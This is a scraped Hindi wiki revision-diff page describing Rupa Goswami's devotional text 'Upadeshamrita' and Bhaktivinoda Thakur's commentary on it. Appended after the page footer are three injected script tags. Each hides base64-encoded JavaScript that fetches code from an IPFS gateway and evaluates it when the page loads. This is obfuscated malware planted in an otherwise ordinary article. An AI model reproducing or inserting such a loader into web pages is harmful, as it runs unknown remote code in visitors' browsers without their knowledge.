Difference between revisions of "उपदेशामृत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
*11 श्लोकों के इस ग्रन्थ में भजनशील व्यक्तियों के लिए [[रूप गोस्वामी]] के अमूल्य अपदेश है।  
 
*11 श्लोकों के इस ग्रन्थ में भजनशील व्यक्तियों के लिए [[रूप गोस्वामी]] के अमूल्य अपदेश है।  
 
*श्रीभक्तिविनोद ठाकुर महाशय ने इसे श्रद्धा भक्ति के पथ के पथिकों के लिए एक आलोक–स्तम्भ के समान जान इस पर पीयूष वर्षिणी टीका लिखी है और इसका 'सुललित त्रिपदी' [[छन्द]] में पद्मानुवाद कर इसे सर्वसाधारण के लिए और भी उपयोगी बनाया है।  
 
*श्रीभक्तिविनोद ठाकुर महाशय ने इसे श्रद्धा भक्ति के पथ के पथिकों के लिए एक आलोक–स्तम्भ के समान जान इस पर पीयूष वर्षिणी टीका लिखी है और इसका 'सुललित त्रिपदी' [[छन्द]] में पद्मानुवाद कर इसे सर्वसाधारण के लिए और भी उपयोगी बनाया है।  
 
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}  
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:16, 8 August 2012

  • 11 shlokoan ke is granth mean bhajanashil vyaktiyoan ke lie roop gosvami ke amooly apadesh hai.
  • shribhaktivinod thakur mahashay ne ise shraddha bhakti ke path ke pathikoan ke lie ek alok–stambh ke saman jan is par piyoosh varshini tika likhi hai aur isaka 'sulalit tripadi' chhand mean padmanuvad kar ise sarvasadharan ke lie aur bhi upayogi banaya hai.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>